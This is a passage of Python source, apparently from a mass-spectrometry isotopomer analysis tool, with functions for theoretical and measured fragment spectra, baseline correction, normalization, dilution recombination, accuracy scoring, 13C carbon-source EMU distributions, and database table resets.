fragmentSpectrum[int(numpy.round(k))] = v/intensityListMax;
else:
fragmentSpectrum[k] = v/intensityListMax;
fragmentSpectrum_O[formula_str_I] = fragmentSpectrum;
return fragmentSpectrum_O;
def report_fragmentSpectrum_normSum(self,fragments_I,round_mass=False):
'''calculate the fragment spectrum'''
# Input: formula_str_I
# Output: spectrum_lst_O
fragmentSpectrum_O = {};
for formula_str_I in fragments_I:
fragmentSpectrum_O[formula_str_I] = None;
formula_str = re.sub('[+-]', '', formula_str_I);
n12C = 0
n13C = 0
if 'C' not in Formula(formula_str)._elements: break; #check if a carbon is even contained in the formula
if 0 in Formula(formula_str)._elements['C']:
n12C += Formula(formula_str)._elements['C'][0]; #get the # of Carbons
if 13 in Formula(formula_str)._elements['C']:
n13C += Formula(formula_str)._elements['C'][13]
mnumber = Formula(formula_str).isotope.massnumber #get the nominal mass number
spectrum = Formula(formula_str).spectrum() #get the spectrum
fragmentSpectrum = {}
for c in range(-n13C, n12C + 1):
if c<0:
exact_mass = Formula(formula_str).isotope.mass+c;
if round_mass:
fragmentSpectrum[int(numpy.round(exact_mass))]=0.0;
else:
fragmentSpectrum[exact_mass]=0.0;
else:
if mnumber+c in spectrum:
exact_mass = spectrum[mnumber+c][0];
if round_mass:
fragmentSpectrum[int(numpy.round(exact_mass))]=spectrum[mnumber+c][1];
else:
fragmentSpectrum[exact_mass]=spectrum[mnumber+c][1];
else:
exact_mass = Formula(formula_str).isotope.mass + c
if round_mass:
fragmentSpectrum[int(numpy.round(exact_mass))]=0.0;
else:
fragmentSpectrum[exact_mass]=0.0;
fragmentSpectrum_O[formula_str_I] = fragmentSpectrum;
return fragmentSpectrum_O;
def extract_peakData_normMax(self, peakData_I, fragments_I, res_I=0.3, round_mass=False):
'''extract maximum intensity peak'''
# Input: peakData_I = mass:intensity
# res_I = mass window/resolution (default = 0.3);
# Output:
# peakSpectrum_theoretical = {fragment:{mass:intensity}}
# peakSpectrum_measured = {fragment:{mass:intensity}}
# peakSpectrum_corrected = {fragment:{mass:intensity}}
# peakSpectrum_normalized = {fragment:{mass:intensity}}
'''The algorithm implement below does not track the peak width for calculation of peak area,
nor for calculate of resolution using FWHM. However, compared to peak-picking algorithm
implemented in analyst(r) and peakView(r), the intensities for most compounds match
the intensities calculated as peaks (compare 140228_MRM_EPI/..._EPI to ..._EPI_peakList
or 140228_ER_EPI/...I to ..._ER).'''
# min peak height
detectionThreshold = 2500.0
# pre-sort for efficiency
# sort masses in peakData
keys = list(peakData_I.keys());
keys.sort();
# determine baseline intensity
# based on the most occuring intensity (background threshold);
values = numpy.array(list(peakData_I.values()));
values_median = mode(values)[0];
if len(values_median) > 1:
baseline = float(max(values_median)); # min returned too much junk
else:
baseline = float(values_median);
if round_mass:
peakSpectrum_theoretical = self.report_fragmentSpectrum_normMax(fragments_I,True);
else:
peakSpectrum_theoretical = self.report_fragmentSpectrum_normMax(fragments_I);
# determine masses from fragments
masses = [];
peakSpectrum_measured_qcqa = {};
peakSpectrum_normalized_qcqa = {};
peakSpectrum_corrected_qcqa = {};
peakSpectrum_measured = {};
peakSpectrum_normalized = {};
peakSpectrum_corrected = {};
for frag,spec in peakSpectrum_theoretical.items():
peakSpectrum_measured_qcqa[frag] = None;
peakSpectrum_corrected_qcqa[frag] = None;
peakSpectrum_normalized_qcqa[frag] = None;
peakSpectrum_measured[frag] = None;
peakSpectrum_corrected[frag] = None;
peakSpectrum_normalized[frag] = None;
if not spec: continue; #check if a carbon is even contained in the fragment
masses = list(spec.keys());
masses.sort(); # sort mass in massList
keyIndex = 0;
keyMax = len(keys);
measured_qcqa = {};
measured = {};
for mass in masses: # iterate through each mass
maxPeak = 0.0;
keyMaxPeak = None;
measured_qcqa[mass] = [keyMaxPeak,maxPeak];
measured[mass] = maxPeak;
while keyIndex<keyMax:
if keys[keyIndex] >= mass - res_I and keys[keyIndex] < mass + res_I:
peak = peakData_I[keys[keyIndex]];
if peak > maxPeak:
maxPeak = peak;
keyMaxPeak = keys[keyIndex];
keyIndex += 1;
elif keys[keyIndex] < mass - res_I:
keyIndex += 1;
continue;
elif keys[keyIndex] >= mass + res_I:
measured_qcqa[mass] = [keyMaxPeak,maxPeak];
measured[mass] = maxPeak;
break;
if measured:
peakSpectrum_measured_qcqa[frag] = measured_qcqa;
peakSpectrum_measured[frag] = measured;
else: break #no peaks were found for the fragment
# correct intensity for background:
corrected_qcqa = {};
#intensityList = [];
for k,v in peakSpectrum_measured_qcqa[frag].items():
if v[1] > detectionThreshold:
if v[1] - baseline > 0.0:
corrected_qcqa[k] = [v[0],v[1] - baseline];
else:
corrected_qcqa[k] = [v[0],0.0];
else:
corrected_qcqa[k] = [v[0],0.0];
#intensityList.append(corrected_qcqa[k][1]);
peakSpectrum_corrected_qcqa[frag] = corrected_qcqa
corrected = {};
intensityList = [];
for k,v in peakSpectrum_measured[frag].items():
if v > detectionThreshold:
if v - baseline > 0.0:
corrected[k] = v - baseline;
else:
corrected[k] = 0.0;
intensityList.append(corrected[k]);
else:
corrected[k] = 0.0;
intensityList.append(corrected[k]);
peakSpectrum_corrected[frag] = corrected;
# normalize each spectrum:
normalized_qcqa = {};
intensityListMax_qcqa = max(intensityList);
for k,v in peakSpectrum_corrected_qcqa[frag].items():
if intensityListMax_qcqa != 0: normalized_qcqa[k] = [v[0],v[1]/intensityListMax_qcqa];
else: normalized_qcqa[k] = [v[0], None];
peakSpectrum_normalized_qcqa[frag] = normalized_qcqa;
normalized = {};
intensityListMax = max(intensityList);
for k,v in peakSpectrum_corrected[frag].items():
if intensityListMax != 0: normalized[k] = v/intensityListMax;
else: normalized[k] = None;
peakSpectrum_normalized[frag] = normalized;
return peakSpectrum_measured, peakSpectrum_corrected, peakSpectrum_normalized;
def extract_peakData_normSum(self, peakData_I, fragments_I, res_I=0.3,round_mass=False):
'''extract maximum intensity peak'''
# Input: peakData_I = mass:intensity
# res_I = mass window/resolution (default = 0.3);
# Output:
# peakSpectrum_theoretical = {fragment:{mass:intensity}}
# peakSpectrum_measured = {fragment:{mass:intensity}}
# peakSpectrum_corrected = {fragment:{mass:intensity}}
# peakSpectrum_normalized = {fragment:{mass:intensity}}
# min peak height
detectionThreshold = 1000.0
# pre-sort for efficiency
# sort masses in peakData
keys = list(peakData_I.keys());
keys.sort();
# determine baseline intensity
# based on the most occuring intensity (background threshold);
values = numpy.array(list(peakData_I.values()));
values_median = mode(values)[0];
if len(values_median) > 1:
baseline = float(max(values_median)); # min returned too much junk
else:
baseline = float(values_median);
if round_mass:
peakSpectrum_theoretical = self.report_fragmentSpectrum_normMax(fragments_I,True);
else:
peakSpectrum_theoretical = self.report_fragmentSpectrum_normMax(fragments_I);
# determine masses from fragments
masses = [];
peakSpectrum_measured_qcqa = {};
peakSpectrum_normalized_qcqa = {};
peakSpectrum_corrected_qcqa = {};
peakSpectrum_measured = {};
peakSpectrum_normalized = {};
peakSpectrum_corrected = {};
for frag,spec in peakSpectrum_theoretical.items():
peakSpectrum_measured_qcqa[frag] = None;
peakSpectrum_corrected_qcqa[frag] = None;
peakSpectrum_normalized_qcqa[frag] = None;
peakSpectrum_measured[frag] = None;
peakSpectrum_corrected[frag] = None;
peakSpectrum_normalized[frag] = None;
if not spec: continue; #check if a carbon is even contained in the fragment
masses = list(spec.keys());
masses.sort(); # sort mass in massList
keyIndex = 0;
keyMax = len(keys);
measured_qcqa = {};
measured = {};
for mass in masses: # iterate through each mass
maxPeak = 0.0;
keyMaxPeak = None;
measured_qcqa[mass] = [keyMaxPeak,maxPeak];
measured[mass] = maxPeak;
while keyIndex<keyMax:
if keys[keyIndex] >= mass - res_I and keys[keyIndex] < mass + res_I:
peak = peakData_I[keys[keyIndex]];
if peak > maxPeak:
maxPeak = peak;
keyMaxPeak = keys[keyIndex];
keyIndex += 1;
elif keys[keyIndex] < mass - res_I:
keyIndex += 1;
continue;
elif keys[keyIndex] >= mass + res_I:
measured_qcqa[mass] = [keyMaxPeak,maxPeak];
measured[mass] = maxPeak;
break;
if measured:
peakSpectrum_measured_qcqa[frag] = measured_qcqa;
peakSpectrum_measured[frag] = measured;
else: break #no peaks were found for the fragment
# correct intensity for background:
corrected_qcqa = {};
#intensityList = [];
for k,v in peakSpectrum_measured_qcqa[frag].items():
if v[1] > detectionThreshold:
if v[1] - baseline > 0.0:
corrected_qcqa[k] = [v[0],v[1] - baseline];
else:
corrected_qcqa[k] = [v[0],0.0];
else:
corrected_qcqa[k] = [v[0],0.0];
#intensityList.append(corrected_qcqa[k][1]);
peakSpectrum_corrected_qcqa[frag] = corrected_qcqa
corrected = {};
intensityList = [];
for k,v in peakSpectrum_measured[frag].items():
if v > detectionThreshold:
if v - baseline > 0.0:
corrected[k] = v - baseline;
else:
corrected[k] = 0.0;
intensityList.append(corrected[k]);
else:
corrected[k] = 0.0;
intensityList.append(corrected[k]);
peakSpectrum_corrected[frag] = corrected;
# normalize each spectrum:
normalized_qcqa = {};
intensityListSum_qcqa = sum(intensityList);
for k,v in peakSpectrum_corrected_qcqa[frag].items():
if intensityListSum_qcqa != 0: normalized_qcqa[k] = [v[0],v[1]/intensityListSum_qcqa];
else: normalized_qcqa[k] = [v[0], None];
peakSpectrum_normalized_qcqa[frag] = normalized_qcqa;
normalized = {};
intensityListSum = sum(intensityList);
for k,v in peakSpectrum_corrected[frag].items():
if intensityListSum != 0: normalized[k] = v/intensityListSum;
else: normalized[k] = None;
peakSpectrum_normalized[frag] = normalized;
return peakSpectrum_measured, peakSpectrum_corrected, peakSpectrum_normalized;
def extract_peakList_normMax(self, peakSpectrum_I, fragments_I, round_mass=False):
'''extract peak spectrum from peak list'''
# Input:
# peakSpectrum_I = {fragment:{(precursor_mass,product_mass):intensity}}
# fragments_I = [fragments]
# Output:
# peakSpectrum_corrected = {fragment:{mass:intensity}}
# peakSpectrum_normalized = {fragment:{mass:intensity}}
# round all precursor/product masses in input for comparison:
peakSpectrum_copy_I = {};
for frag,spec in peakSpectrum_I.items():
peakSpectrum_tmp = {};
for masses,intensity in spec.items():
peakSpectrum_tmp[numpy.around(masses)] = intensity;
peakSpectrum_copy_I[frag] = peakSpectrum_tmp;
if round_mass:
peakSpectrum_theoretical = self.report_fragmentSpectrum_normMax(fragments_I,True);
else:
peakSpectrum_theoretical = self.report_fragmentSpectrum_normMax(fragments_I);
# determine masses from fragments
masses = [];
peakSpectrum_normalized = {};
peakSpectrum_corrected = {};
for frag,spec in peakSpectrum_theoretical.items():
peakSpectrum_corrected[frag] = None;
peakSpectrum_normalized[frag] = None;
if not spec: continue; #check if a carbon is even contained in the fragment
masses = list(spec.keys());
masses.sort(); # sort mass in massList
masses_rounded = numpy.around(masses); # round masses to nearest digit for comparison
# 1. copy data from peakSpectrum_I to peakSpectrum_corrected based on theoretical fragments
intensityList = [];
if frag in peakSpectrum_I:
fragment_masses = [k for k in peakSpectrum_copy_I[frag].keys()];
corrected_spec = {};
for i,mass in enumerate(masses_rounded):
corrected = 0.0;
if mass in fragment_masses:
corrected = peakSpectrum_copy_I[frag][mass];
corrected_spec[masses[i]] = corrected;
intensityList.append(corrected);
peakSpectrum_corrected[frag] = corrected_spec;
else:
corrected_spec = {};
for i,mass in enumerate(masses_rounded):
corrected = 0.0;
corrected_spec[masses[i]] = corrected;
intensityList.append(corrected);
peakSpectrum_corrected[frag] = corrected_spec;
# normalize each spectrum:
#NOTE: normalization by max to allow for later conversion to normalization by sum
normalized = {};
intensityListMax = max(intensityList);
for k,v in peakSpectrum_corrected[frag].items():
if v:
if intensityListMax != 0: normalized[k] = v/intensityListMax;
else: normalized[k] = None;
else: normalized[k] = None;
peakSpectrum_normalized[frag] = normalized;
return peakSpectrum_corrected, peakSpectrum_normalized;
def extract_peakList_normSum(self, peakSpectrum_I, fragments_I, round_mass=False):
'''extract peak spectrum from peak list'''
# Input:
# peakSpectrum_I = {fragment:{mass:intensity}}
# fragments_I = [fragments]
# Output:
# peakSpectrum_corrected = {fragment:{mass:intensity}}
# peakSpectrum_normalized = {fragment:{mass:intensity}}
# round all precursor/product masses in input for comparison:
peakSpectrum_copy_I = {};
for frag,spec in peakSpectrum_I.items():
peakSpectrum_tmp = {};
for masses,intensity in spec.items():
peakSpectrum_tmp[numpy.around(masses)] = intensity;
peakSpectrum_copy_I[frag] = peakSpectrum_tmp;
if round_mass:
peakSpectrum_theoretical = self.report_fragmentSpectrum_normSum(fragments_I,True);
else:
peakSpectrum_theoretical = self.report_fragmentSpectrum_normSum(fragments_I);
# determine masses from fragments
masses = [];
peakSpectrum_normalized = {};
peakSpectrum_corrected = {};
for frag,spec in peakSpectrum_theoretical.items():
peakSpectrum_corrected[frag] = None;
peakSpectrum_normalized[frag] = None;
if not spec: continue; #check if a carbon is even contained in the fragment
masses = list(spec.keys());
masses.sort(); # sort mass in massList
masses_rounded = numpy.around(masses); # round masses to nearest digit for comparison
# 1. copy data from peakSpectrum_I to peakSpectrum_corrected based on theoretical fragments
intensityList = [];
if frag in peakSpectrum_I:
fragment_masses = [k for k in peakSpectrum_copy_I[frag].keys()];
corrected_spec = {};
for i,mass in enumerate(masses_rounded):
corrected = 0.0;
if mass in fragment_masses and peakSpectrum_copy_I[frag][mass]:
corrected = peakSpectrum_copy_I[frag][mass];
corrected_spec[masses[i]] = corrected;
intensityList.append(corrected);
peakSpectrum_corrected[frag] = corrected_spec;
else:
corrected_spec = {};
for i,mass in enumerate(masses_rounded):
corrected = 0.0;
corrected_spec[masses[i]] = corrected;
intensityList.append(corrected);
peakSpectrum_corrected[frag] = corrected_spec;
# normalize each spectrum:
normalized = {};
intensityListSum = sum(intensityList);
for k,v in peakSpectrum_corrected[frag].items():
if v>0.0:
if intensityListSum != 0: normalized[k] = v/intensityListSum;
else: normalized[k] = None;
else: normalized[k] = None;
peakSpectrum_normalized[frag] = normalized;
return peakSpectrum_corrected, peakSpectrum_normalized;
def recombine_dilutionsMRMs(self,peakData_I):
'''Method to "recombine" MRMs from one dilution to the next'''
# input: peakData_I = {frag:[mass:{'intensity':intensity,
# 'dilution':dilution,
# 'used_':used_,
# 'comment_':comment_}]}
# e.g.: {frag:[100:{'dilution':'high',...}],
# [101:{'dilution':'low','comment_':'Recombine',...}],
# [101:{'dilution':'high','comment_':'Recombine',...}],
# [102:{'dilution':'low','comment_':'Recombine',...}],
# [103:{'dilution':'low',...}],...}
# NOTE: dictionary > List of dictionaries
# NOTE: input list of masses must be sorted in ascending order
# followed by 'dilutions' in descending order as shown below!
# output: peakData_O = {frag:{mass:{'intensity':intensity,
# 'dilution':dilution,
# 'used_':used_,
# 'comment_':comment_}}}
# peakData_O_false = {frag:{mass:{'intensity':intensity,
# 'dilution':dilution,
# 'used_':used_,
# 'comment_':comment_}}}
# Note: second output structure needed to update rows that are changed to false
'''Algorithm:
start:
dilution m comment used
'low' 0 '' false
'high' 0 '' true
'low' 1 'Recombine' true
'high' 1 'Recombine' true
'low' 2 'Recombine' true
'high' 2 '' false
'low' 3 '' true
'high' 3 '' false
recombine...
end:
dilution m comment used
'low' 0 '' false
'high' 0 '' true
'low' 1 'Recombine' false
'high' 1 'Recombine' true
'low' 2 'Recombine' true
'high' 2 '' false
'low' 3 '' true
'high' 3 '' false
...
done prior: set normalized intensity to diluion 'low', m 1 to 1;
recalculate the rest of the normalized intensities for the dilutions 'low', m 2,3,4,...;
calculate the percent change from dilution 'low', m 1 to dilution 'low', m 2; from dilution 'low', m 2 to dilution 'low', m 3; ...;
replace dilution 'high', m 2 with the normalized intensity for dilution 'low', m 1 - the percent change from dilution 'low', m 1 to dilution 'low', m 2;
replace dilution 'low', m 3 with the new normalized intensity for m 2 - the percent change from dilution 'low', m 2 to dilution 'low', m 3;
...;'''
peakData_O = {};
peakData_O_false = {};
#iterate through each fragment
for frag,spec in peakData_I.items():
peakData_O[frag] = None;
peakData_O_false[frag] = None;
spec_O = {};
spec_O_false = {};
if not spec: continue; #check if there is data for the fragment
# extract out dilutions
dilutions = [];
for d in spec:
values = list(d.values())[0];
dilutions.append(values['dilution']);
dilutions = list(set(dilutions));
dilutions.sort();
dilutions_dict = dict(list(zip(dilutions,['low','high'])));
#iterate through each spectrum
intensity_prev = 0.0
intensity_new = 0.0;
intensity_difference = 0.0;
recombine_cnt = 0;
for spec_dict in spec:
mass = list(spec_dict.keys())[0];
data = list(spec_dict.values())[0];
spec_O[mass] = None;
data_O = {};
if not data['intensity']:
data_O['dilution'] = None;
data_O['intensity'] = None;
data_O['comment_'] = None;
data_O['used_'] = None;
spec_O[mass] = data_O;
continue;
if data['comment_'] == 'Recombine':
if recombine_cnt == 0: # 1st recombination event
if dilutions_dict[data['dilution']] != 'low': print('bad input');
intensity_prev = data['intensity'];
data['used_'] = False;
# copy the data
data_O['dilution'] = data['dilution'];
data_O['intensity'] = data['intensity'];
data_O['comment_'] = data['comment_'];
data_O['used_'] = data['used_'];
spec_O_false[mass] = data_O;
recombine_cnt += 1;
continue
elif recombine_cnt == 1: # 2nd recombination event
if dilutions_dict[data['dilution']] != 'high': print('bad input');
intensity_new = data['intensity'];
recombine_cnt += 1;
elif recombine_cnt == 2: # 3rd recombination event
if dilutions_dict[data['dilution']] != 'low': print('bad input');
intensity_difference = data['intensity']/intensity_prev;
intensity_prev = data['intensity'];
intensity_new = intensity_new*intensity_difference;
data['intensity'] = intensity_new;
recombine_cnt += 1;
elif recombine_cnt >= 3:
if dilutions_dict[data['dilution']] != 'low': print('bad input');
intensity_difference = data['intensity']/intensity_prev;
intensity_prev = data['intensity'];
intensity_new = intensity_new*intensity_difference;
data['intensity'] = intensity_new;
recombine_cnt += 1;
# copy data
data_O['dilution'] = data['dilution'];
data_O['intensity'] = data['intensity'];
data_O['comment_'] = data['comment_'];
data_O['used_'] = data['used_'];
spec_O[mass] = data_O;
# copy spectrum
peakData_O[frag] = spec_O
peakData_O_false[frag] = spec_O_false
#copy out the intensities without the comments
peakData_intensities_O = {};
for frag,spec in peakData_O.items():
spec_tmp = {};
for mass,v in spec.items():
spec_tmp[mass]=v['intensity'];
peakData_intensities_O[frag] = spec_tmp;
return peakData_O,peakData_O_false,peakData_intensities_O;
def normalize_peakSpectrum_normMax(self,peakSpectrum_I,scalingFactors_I):
'''normalize peakSpectrum taken from different m+0, m+1, ... fragments
using a reference scaling factor'''
# Input:
# peakSpectrum_I = {precursor_fragment:{product_fragment:{product_mass:intensity}}}
# scalingFactors_I = {precursor_fragment:intensity}
# Output:
# peakSpectrum_normalized = {product_fragment:{mass:intensity}}
'''Algorithm:
part 1: scale
for each precursor i:
for each product j in precursor i:
for each mass m in product j:
peakSpectrum[precursor_i][product_j][m]*scalingFactor[precursor_i]
part 2: reduce:
for each product j in all precursors:
for each mass in product j:
for each precursor i with product j:
peakSpectrum_O[product_j][m] += peakSpectrum[precursor_i][product_j][m]*scalingFactor[precursor_i]
'''
precursor_fragments_I = list(peakSpectrum_I.keys());
precursorSpectrum_dict = {};
product_fragments_all = [];
product_mass_all = [];
# iterate through each precursor fragment
for precursor in precursor_fragments_I:
product_fragments_I = list(peakSpectrum_I[precursor].keys());
productSpectrum_dict = {};
product_fragments_all.extend(product_fragments_I);
# iterate through each product fragment
for product in product_fragments_I:
spectrum_dict = {};
product_mass_dict = {};
product_mass_tmp = [];
# iterate through each mass
for k,v in peakSpectrum_I[precursor][product].items():
if peakSpectrum_I[precursor][product][k]:
spectrum_dict[k] = peakSpectrum_I[precursor][product][k]*scalingFactors_I[precursor];
else:
spectrum_dict[k] = 0.0;
product_mass_tmp.append(k);
productSpectrum_dict[product] = spectrum_dict;
product_mass_dict[product] = product_mass_tmp;
product_mass_all.append(product_mass_dict);
precursorSpectrum_dict[precursor] = productSpectrum_dict
# reduce product fragments list
product_fragments_reduced = list(set(product_fragments_all));
# reduce product masses
product_mass_combined = {};
product_mass_reduced = {};
for product in product_fragments_all:
product_mass_combined[product] = [];
for product_mass in product_mass_all:
if product in product_mass:
product_mass_combined[product].extend(product_mass[product]);
product_mass_reduced[product] = list(set(product_mass_combined[product]));
peakSpectrum_normalized_O = {};
# iterate through all common product fragments
for product in product_fragments_reduced:
peakSpectrum_normalized_O[product] = None;
peakSpectrum_normalized_tmp = {};
# iterate through each mass
for mass in product_mass_reduced[product]:
peakSpectrum_normalized_tmp[mass] = 0.0;
# iterate through each precursor
for precursor in precursor_fragments_I:
if product in precursorSpectrum_dict[precursor]:
if mass in precursorSpectrum_dict[precursor][product]:
peakSpectrum_normalized_tmp[mass] += precursorSpectrum_dict[precursor][product][mass]
else:
peakSpectrum_normalized_tmp[mass] += 0.0;
else: peakSpectrum_normalized_tmp[mass] += 0.0;
peakSpectrum_normalized_O[product] = peakSpectrum_normalized_tmp;
# re-normalize the spectrum to max-normalized spectrum
intensityListMax = {};
peakSpectrum_normalized_O_max = {};
for product,spec in peakSpectrum_normalized_O.items():
intensityList = [];
for mass,intensity in spec.items():
intensityList.append(intensity);
intensityListMax = max(intensityList);
fragmentSpectrum = {};
for mass,intensity in spec.items():
if intensityListMax != 0.0:
fragmentSpectrum[mass] = intensity/intensityListMax;
else:
fragmentSpectrum[mass] = 0.0;
peakSpectrum_normalized_O_max[product] = fragmentSpectrum;
return peakSpectrum_normalized_O_max
def calculate_fragmentSpectrumAccuracy(self, peakSpectrum_normalized_list_I):
'''calculate the accuracy from the normalized intensity'''
# Input:
# peakSpectrum_normalized_list_I = [{fragment:{mass:intensity}}]
# Output:
# peakSpectrum_accuracy_O = {fragment:float};
fragments_I = list(peakSpectrum_normalized_list_I[0].keys());
peakSpectrum_theoretical = self.report_fragmentSpectrum_normMax(fragments_I,True);
peakSpectrum_accuracy_O = {};
for frag in fragments_I:
peakSpectrum_accuracy_O[frag] = None;
if not peakSpectrum_theoretical[frag]: continue; # no carbons in fragment
intensityList = [];
masses = [];
for peakSpectrum in peakSpectrum_normalized_list_I:
intensityDict = {};
peakSpectrumMasses = list(peakSpectrum_theoretical[frag].keys());
for mass in peakSpectrumMasses:
if frag in peakSpectrum and mass in peakSpectrum[frag] and peakSpectrum[frag][mass] > 0.0:
intensityDict[mass] = peakSpectrum[frag][mass];
else:
intensityDict[mass] = 0.0;
if not mass in masses: masses.append(mass);
intensityList.append(intensityDict);
## uncomment to only compare measured masses
#intensityDict = {};
#peakSpectrumMasses = peakSpectrum[frag].keys();
#for mass in peakSpectrumMasses:
# if peakSpectrum[frag][mass] > 0.0:
# intensityDict[mass] = peakSpectrum[frag][mass];
# if not mass in masses: masses.append(mass);
#intensityList.append(intensityDict);
accuracyLst = [];
for mass in masses:
data = [];
for intensity in intensityList:
if intensity[mass]>=0.0:data.append(intensity[mass]);
if data and peakSpectrum_theoretical[frag][mass]:
intensity_array = numpy.array(data);
accuracyLst.append(abs(intensity_array.mean() - peakSpectrum_theoretical[frag][mass]))
accuracyLstMean = None;
if accuracyLst:
accuracyLstMean = numpy.mean(accuracyLst);
peakSpectrum_accuracy_O[frag] = accuracyLstMean;
else: peakSpectrum_accuracy_O[frag] = None;
return peakSpectrum_accuracy_O;
def calculate_fragmentSpectrumAccuracy_normSum(self, peakSpectrum_normalized_list_I):
'''calculate the accuracy from the normalized intensity'''
# Input:
# peakSpectrum_normalized_list_I = [{fragment:{mass:intensity}}]
# Output:
# peakSpectrum_accuracy_O = {fragment:float};
fragments_I = list(peakSpectrum_normalized_list_I[0].keys());
peakSpectrum_theoretical = self.report_fragmentSpectrum_normSum(fragments_I,True);
peakSpectrum_accuracy_O = {};
for frag in fragments_I:
peakSpectrum_accuracy_O[frag] = None;
if not peakSpectrum_theoretical[frag]: continue; # no carbons in fragment
intensityList = [];
masses = [];
for peakSpectrum in peakSpectrum_normalized_list_I:
intensityDict = {};
peakSpectrumMasses = list(peakSpectrum_theoretical[frag].keys());
for mass in peakSpectrumMasses:
if frag in peakSpectrum and mass in peakSpectrum[frag] and peakSpectrum[frag][mass] > 0.0:
intensityDict[mass] = peakSpectrum[frag][mass];
else:
intensityDict[mass] = 0.0;
if not mass in masses: masses.append(mass);
intensityList.append(intensityDict);
## uncomment to only compare measured masses
#intensityDict = {};
#peakSpectrumMasses = peakSpectrum[frag].keys();
#for mass in peakSpectrumMasses:
# if peakSpectrum[frag][mass] > 0.0:
# intensityDict[mass] = peakSpectrum[frag][mass];
# if not mass in masses: masses.append(mass);
#intensityList.append(intensityDict);
accuracyLst = [];
for mass in masses:
data = [];
for intensity in intensityList:
if intensity[mass]>=0.0:data.append(intensity[mass]);
if data and peakSpectrum_theoretical[frag][mass]:
intensity_array = numpy.array(data);
accuracyLst.append(abs(intensity_array.mean() - peakSpectrum_theoretical[frag][mass]))
accuracyLstMean = None;
if accuracyLst:
accuracyLstMean = numpy.mean(accuracyLst);
peakSpectrum_accuracy_O[frag] = accuracyLstMean;
else: peakSpectrum_accuracy_O[frag] = None;
return peakSpectrum_accuracy_O;
def make_CSourceMix(self,csources_I, composition_I):
'''Make a carbon source mix of a specified composition'''
# Input: (e.g. 80/20 1-13C/U-13C glc)
# csources_I = backbone of the csources [['[13C]HO','CH2O','CH2O','CH2O','CH2O','CH3O'],
# ['[13C]HO','[13C]H2O','[13C]H2O','[13C]H2O','[13C]H2O','[13C]H3O']]
# composition_I = composition csources [0.8,0.2]
# Output:
# emu_O = {strings of emu distribution: spectral list}
emu_O = {};
emu_all = [];
ncsources = len(csources_I)
for cs in csources_I:
emu_tmp = {};
emu_tmp = self.make_EMUDistributionAndCSpectra(cs)
emu_all.append(emu_tmp);
for k in list(emu_all[0].keys()):
spectra_tmp = [];
spectra_tmp = [0.0]*len(emu_all[0][k])
for i in range(ncsources):
for j in range(len(emu_all[i][k])):
spectra_tmp[j] += composition_I[i]*emu_all[i][k][j];
emu_O[k] = spectra_tmp;
return emu_O;
def make_EMUDistributionAndCSpectra(self,csource_I):
'''Make EMU distribution based on the carbon source'''
# Input:
# csource_I = carbon backbone of the csource
# e.g. 1-13C glc = ['[13C]HO','CH2','CH2','CH2','CH2','CH3O']
# U-13C glc = ['[13C]HO','[13C]H2O','[13C]H2O','[13C]H2O','[13C]H2O','[13C]H3O']
# glc = ['CHO','CH2O','CH2O','CH2O','CH2O','CH3O']
# Output:
# emu_O = {strings of emu distribution: spectral list}
nC = len(csource_I)
emu_O = {};
# iterate through each carbon and change from 0 to 1
emu_c = nC*'0'; #intialize
emu_lst = list(emu_c);
for j in range(nC):
emu_lst[j] = '1'
for c in range(j,nC):
emu_lst_2 = copy.copy(emu_lst)
emu_lst_2[j] = '0';
emu_lst_2[c] = '1';
emu_tmp = copy.copy(emu_lst_2);
cfrag = [];
for i in range(c,nC):
emu_tmp[c] = '0';
emu_tmp[i] = '1';
emu_str = 'x' + ''.join(emu_tmp)
dfrag = [csource_I[p] for p,n in enumerate(emu_tmp) if n=='1']
dfrag_tmp = ''.join(dfrag)
#if emu_str.find('0')==-1: #ignore the fully labeled fragment
# continue;
spectrum_tmp = self.report_fragmentSpectrum_normSum([dfrag_tmp],round_mass=True)
# format from dict into a list:
spectrum_tmp_lst = [];
spectrum_masses_lst = [];
for k,v in spectrum_tmp[dfrag_tmp].items():
spectrum_masses_lst.append(k);
spectrum_masses_lst.sort();
for k in spectrum_masses_lst:
spectrum_tmp_lst.append(spectrum_tmp[dfrag_tmp][k]);
emu_O[emu_str] = spectrum_tmp_lst;
emu_c = nC*'1'; #intialize
emu_lst = list(emu_c);
for j in range(nC-1):
emu_lst[j] = '0'
for c in range(j,nC-1):
emu_lst_2 = copy.copy(emu_lst)
emu_lst_2[j] = '1';
emu_lst_2[c] = '0';
emu_tmp = copy.copy(emu_lst_2);
cfrag = [];
for i in range(c,nC-1):
emu_tmp[c] = '1';
emu_tmp[i] = '0';
emu_str = 'x' + ''.join(emu_tmp)
dfrag = [csource_I[p] for p,n in enumerate(emu_tmp) if n=='1']
dfrag_tmp = ''.join(dfrag)
#if emu_str.find('0')==-1: #ignore the fully labeled fragment
# continue;
spectrum_tmp = self.report_fragmentSpectrum_normSum([dfrag_tmp],round_mass=True)
# format from dict into a list:
spectrum_tmp_lst = [];
spectrum_masses_lst = [];
for k,v in spectrum_tmp[dfrag_tmp].items():
spectrum_masses_lst.append(k);
spectrum_masses_lst.sort();
for k in spectrum_masses_lst:
spectrum_tmp_lst.append(spectrum_tmp[dfrag_tmp][k]);
emu_O[emu_str] = spectrum_tmp_lst;
return emu_O;
#table updates:
def update_dataStage01NormalizedFromAverages(self,experiment_id_I):
'''update data_stage01_normalized from data_stage01_averages'''
# get row information for all samples
row = [];
row = self.stage01_isotopomer_query.get_row_experimentID_dataStage01Averages(experiment_id_I);
# update entries that match the corresponding experiment_id/sample_name_abbreviation/sample_type/time_point/met_id/fragment_formula/fragment_mass
# with used_ and comment_
self.stage01_isotopomer_query.update_usedAndComment_stage01_isotopomer_normalized(row);
#table initializations:
def drop_dataStage01(self):
try:
#data_stage01_isotopomer_MQResultsTable.__table__.drop(engine,True);
data_stage01_isotopomer_peakData.__table__.drop(engine,True);
data_stage01_isotopomer_peakList.__table__.drop(engine,True);
data_stage01_isotopomer_peakSpectrum.__table__.drop(engine,True);
data_stage01_isotopomer_normalized.__table__.drop(engine,True);
data_stage01_isotopomer_averages.__table__.drop(engine,True);
data_stage01_isotopomer_averagesNormSum.__table__.drop(engine,True);
data_stage01_isotopomer_spectrumAccuracy.__table__.drop(engine,True);
except SQLAlchemyError as e:
print(e);
def reset_dataStage01(self,experiment_id_I = None):
try:
if experiment_id_I:
reset = self.session.query(data_stage01_isotopomer_peakSpectrum).filter(data_stage01_isotopomer_peakSpectrum.experiment_id.like(experiment_id_I)).delete(synchronize_session=False);
reset = self.session.query(data_stage01_isotopomer_peakList).filter(data_stage01_isotopomer_peakList.experiment_id.like(experiment_id_I)).delete(synchronize_session=False);
